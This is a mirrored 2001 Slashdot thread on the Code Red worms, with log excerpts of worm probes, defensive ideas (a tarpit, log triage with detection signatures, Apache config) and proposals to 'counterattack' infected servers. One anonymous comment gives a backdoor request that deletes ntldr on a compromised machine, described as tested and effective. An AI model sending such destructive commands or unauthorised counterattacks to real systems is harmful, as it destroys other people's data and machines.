Slashdot Mirror


Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

17 of 759 comments

  1. More information? by Dr. Evil · · Score: 5, Interesting

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.

  2. Perhaps we should reconsider... by Rob Mac K · · Score: 3, Interesting
    I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

    Thoughts?

    1. Re:Perhaps we should reconsider... by norton_I · · Score: 3, Interesting

      I have been seriously considering the "counterattack" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

      I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

      Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

      This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

  3. Re:Buffer overflow vulnerabilities by Macrobat · · Score: 0, Interesting

    Tell you what. Show me the source for an OS coded in Java, I'll see if I can't find buffer overflow risks in it.

    --
    "Hardly used" will not fetch you a better price for your brain.
  4. Could this be it? by ecki · · Score: 2, Interesting
    Found a lot of those in my access.log...:

    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

    Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firewall.

  5. Use Open Source to Fight Code Red by isn't my name · · Score: 4, Interesting

    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01368.html
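The LaBrea idea in miniature, as an added example (this is not LaBrea's own code and nothing in it comes from the thread): a listening socket whose accept loop lets the kernel finish the three way handshake and then never reads or replies, so a scanner thread has to sit through its own timeout before it can move on. The loopback address, the timeout values and the probe request are assumptions made for the demo.

```python
"""Minimal application-level TCP tarpit in the spirit of LaBrea.

Added example, not LaBrea itself.  LaBrea answers SYNs at the packet level
for addresses nobody is using; here a real listening socket lets the kernel
complete the handshake, after which we deliberately never service the
connection.  The scanning side (probe) then burns its whole timeout.
"""
import socket
import threading
import time


class Tarpit:
    """Accept connections and hold them open without ever reading or writing."""

    def __init__(self, host="127.0.0.1", port=0):
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((host, port))          # port 0: let the OS pick one
        self._srv.listen(128)
        self.port = self._srv.getsockname()[1]
        self._held = []                       # accepted sockets we never touch
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)
        self._thread.start()

    def _accept_loop(self):
        self._srv.settimeout(0.2)             # wake up periodically to check _stop
        while not self._stop.is_set():
            try:
                conn, _ = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            # Handshake is complete; keep the socket open and go silent.
            self._held.append(conn)

    @property
    def held(self):
        """Number of connections currently being sat on."""
        return len(self._held)

    def close(self):
        self._stop.set()
        self._thread.join(timeout=2)
        for conn in self._held:
            conn.close()
        self._srv.close()


def probe(host, port, timeout=0.5,
          request=b"GET /default.ida?XXXX HTTP/1.0\r\n\r\n"):
    """Behave like one scanner thread: connect, send a probe, wait for a reply.

    Returns ("tarpitted", seconds) when no reply arrives before our timeout,
    or ("answered", seconds) if the peer responded or closed the connection.
    The request body is a constructed stand-in for a Code Red probe.
    """
    t0 = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(request)
        try:
            s.recv(1024)
            return ("answered", time.monotonic() - t0)
        except socket.timeout:
            return ("tarpitted", time.monotonic() - t0)


if __name__ == "__main__":
    pit = Tarpit()
    try:
        print(probe("127.0.0.1", pit.port, timeout=1.0))   # expect "tarpitted"
    finally:
        pit.close()
```

The point demonstrated is only that one accepted connection costs the scanner a full timeout for almost nothing on the tarpit side. The real LaBrea goes further: it claims unused addresses by answering ARP for them and can hold the peer with a zero receive window so its retransmits stall too, which is why it works without a host actually sitting on those IPs.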

  6. Re:You know... by pmz · · Score: 2, Interesting

    Just write a new version that infects IIS, shuts it off, installs a better web server, and voilà, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

  7. Microsoft feature? by sjonke · · Score: 2, Interesting

    Noticing code red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on which the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIS.

    --
    --- What?
  8. Tested, working... Effective. by Anonymous Coward · · Score: 1, Interesting
    /root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

    Bye bye boot process...

  9. Re:Why aren't these machines patched yet? by Anonymous Coward · · Score: 1, Interesting

    It is interesting that most of the machines attacking me are from Korea and Turkey.. Only 5% of attacks towards my machine are coming from US IP space. I think Micro$oft should send people door to door overseas and patch the machines..

  10. Re:Copycats by analog_line · · Score: 1, Interesting
    Whaddaya mean it's dead? If the traffic light on my cable modem is any indication, it's still alive and kicking. Maybe it ain't "cool" anymore but it's still out there and making a mess of things.

    The only thing that's going to "let it die" is if the stupidity/incompetence that this virus so neatly reveals is cured and people patch their fucking servers. Until then, there's plenty to talk about. Hell, there's more to talk about. It's getting close to a month that systems have been getting hit by this virus and people are still being infected when an easy solution has been available for over two months. What planet are these people on?

  11. An ETHICAL way to Anti-Virus by Slur · · Score: 5, Interesting

    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very minuscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

    --
    -- thinkyhead software and media
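An added example that ties together ecki's log excerpt (comment 4) and Slur's notification idea (comment 11); it is not code from either poster. It parses Apache common-format lines, separates the .ida/.idq overflow requests that Code Red uses to spread from requests for root.exe and cmd.exe (someone probing for the backdoor Code Red II leaves behind, which is the distinction ecki asks about), groups hits by source address, and fills in a form letter per address. The log lines, the 192.0.2.x/198.51.100.x addresses and the FAKE_PTR table are constructed so the script runs offline; on a live log you would replace reverse_lookup() with socket.gethostbyaddr().

```python
"""Triage Code Red hits in an Apache common-format access log.

Added example; not code posted in the thread.  SAMPLE_LOG is constructed to
mirror the request patterns shown above, and FAKE_PTR stands in for DNS so
the whole thing runs offline.  Swap reverse_lookup() for socket.gethostbyaddr
to use it on a live log.
"""
import re
from collections import defaultdict

# Apache "common" format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Two distinct things show up in the logs quoted in the thread:
#  - the .ida/.idq Index Server ISAPI overflow itself (a long run of a single
#    filler byte such as N, X or A), which is how Code Red spreads, and
#  - requests for root.exe / cmd.exe, i.e. someone probing for the backdoor
#    that Code Red II leaves on a compromised host.
SIGNATURES = (
    ("ida-overflow", re.compile(r"\.id[aq]\?.*?([NXA])\1{19,}", re.I)),
    ("crii-backdoor", re.compile(r"/root\.exe|/winnt/system32/cmd\.exe", re.I)),
)


def classify(uri):
    """Return the matching signature name, or None for an ordinary request."""
    for name, pattern in SIGNATURES:
        if pattern.search(uri):
            return name
    return None


def parse_line(line):
    """Parse one common-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def triage(lines):
    """Map each attacking source IP to {signature: hit count}."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sig = classify(rec["uri"])
        if sig:
            hits[rec["ip"]][sig] += 1
    return {ip: dict(sigs) for ip, sigs in hits.items()}


# Hypothetical PTR results so the example needs no network access.
FAKE_PTR = {"192.0.2.10": "dsl-10.example.net"}


def reverse_lookup(ip, table=FAKE_PTR):
    """Offline stand-in for socket.gethostbyaddr(ip)[0]; None if no PTR."""
    return table.get(ip)


def draft_notice(ip, sigs, ptr):
    """Fill in a form letter like the one Slur describes sending by hand."""
    host = ptr or "(no reverse DNS)"
    kinds = ", ".join(f"{name} x {count}" for name, count in sorted(sigs.items()))
    return (
        f"Hi,\n\nA host on your network, {ip} ({host}), is sending Code Red "
        f"requests to my web server ({kinds}). If this is one of your customers, "
        f"please ask them to take the IIS machine offline, clean or reinstall it, "
        f"and apply Microsoft's patch for the Index Server ISAPI vulnerability "
        f"before putting it back online.\n"
    )


def notices(lines, table=FAKE_PTR):
    """One notification draft per attacking IP, keyed by IP."""
    return {ip: draft_notice(ip, sigs, reverse_lookup(ip, table))
            for ip, sigs in triage(lines).items()}


# Constructed sample in the same shape as the lines quoted in the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
192.0.2.10 - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
192.0.2.10 - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
192.0.2.10 - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X HTTP/1.1" 404 214
192.0.2.77 - - [10/Aug/2001:04:12:01 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858=a HTTP/1.0" 404 214
198.51.100.5 - - [10/Aug/2001:04:13:00 -0700] "GET /index.html HTTP/1.1" 200 1024
""".splitlines()

if __name__ == "__main__":
    for ip, text in notices(SAMPLE_LOG).items():
        print(f"--- to the admin responsible for {ip} ---\n{text}")
```

Run it from cron over the current log (or pipe `tail -f` into it) and it produces one draft per offending address rather than one per request, which is what you want before anything gets mailed; the backdoor probes are reported separately because a host asking for root.exe is not necessarily itself infected.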
  12. Code Red infection in spite of patch by shibut · · Score: 2, Interesting

    At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

    We've been CR-free for 2 whole days now

    For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

  13. Re:Why aren't these machines patched yet? by nether · · Score: 2, Interesting

      Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2001-08/0218.html

  14. I saw that Reuters story earlier by GC · · Score: 4, Interesting

    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

  15. Re:Stop addressing Code Red by Geoff · · Score: 2, Interesting
    The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed.

    Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

    Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

    Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.
    --

    Computers are useless. They can only give you answers. -- Pablo Picasso

  16. Put it in another log and forget about it. by Malc · · Score: 4, Interesting
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer."

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    # Tag any request whose URI contains default.ida (the Code Red probe)
    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    # Write tagged requests to their own log...
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    # ...and keep everything else in the normal access log
    CustomLog /var/log/apache/access.log common env=!code-red-request

    # Bounce the probe back to the sender's own loopback address
    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1